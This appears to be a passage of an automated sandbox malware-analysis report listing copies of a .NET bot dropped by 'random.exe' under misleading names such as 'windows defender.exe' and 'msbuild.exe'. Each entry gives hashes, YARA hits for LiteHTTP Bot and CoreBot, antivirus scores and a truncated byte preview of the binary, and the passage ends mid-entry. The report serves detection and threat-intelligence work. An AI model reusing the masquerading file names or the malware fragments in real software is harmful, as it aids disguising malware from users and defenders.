                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0

                          C:\Users\user\OneDrive\mozilla maintenance service.exe

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\mozilla maintenance service.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\mozilla maintenance service.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          C:\Users\user\OneDrive\mozilla maintenance service.exe:Zone.Identifier

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0

                          C:\Users\user\OneDrive\msbuild.exe

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\msbuild.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\msbuild.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          C:\Users\user\OneDrive\msbuild.exe:Zone.Identifier

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0

                          C:\Users\user\OneDrive\msecache.exe

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\msecache.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\msecache.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          C:\Users\user\OneDrive\msecache.exe:Zone.Identifier

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0

                          C:\Users\user\OneDrive\reference assemblies.exe

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\reference assemblies.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\reference assemblies.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          C:\Users\user\OneDrive\reference assemblies.exe:Zone.Identifier

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0

                          C:\Users\user\OneDrive\windows defender.exe

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\windows defender.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\windows defender.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          C:\Users\user\OneDrive\windows defender.exe:Zone.Identifier

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:false
                          Preview:[ZoneTransfer]....ZoneId=0

                          C:\Users\user\OneDrive\windows mail.exe

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\windows mail.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\windows mail.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          C:\Users\user\OneDrive\windows mail.exe:Zone.Identifier

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:false
                          Preview:[ZoneTransfer]....ZoneId=0

                          C:\Users\user\OneDrive\windows media player.exe

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\windows media player.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\windows media player.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          C:\Users\user\OneDrive\windows media player.exe:Zone.Identifier

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:false
                          Preview:[ZoneTransfer]....ZoneId=0

                          C:\Users\user\OneDrive\windows multimedia platform.exe

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\windows multimedia platform.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\windows multimedia platform.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          C:\Users\user\OneDrive\windows multimedia platform.exe:Zone.Identifier

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:false
                          Preview:[ZoneTransfer]....ZoneId=0

                          C:\Users\user\OneDrive\windows nt.exe

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\windows nt.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\windows nt.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          C:\Users\user\OneDrive\windows nt.exe:Zone.Identifier

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:false
                          Preview:[ZoneTransfer]....ZoneId=0

                          C:\Users\user\OneDrive\windows photo viewer.exe

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\windows photo viewer.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\windows photo viewer.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          C:\Users\user\OneDrive\windows photo viewer.exe:Zone.Identifier

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:false
                          Preview:[ZoneTransfer]....ZoneId=0

                          C:\Users\user\OneDrive\windows portable devices.exe

                          Download File
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\windows portable devices.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\windows portable devices.exe, Author: ditekSHen
                          Antivirus:
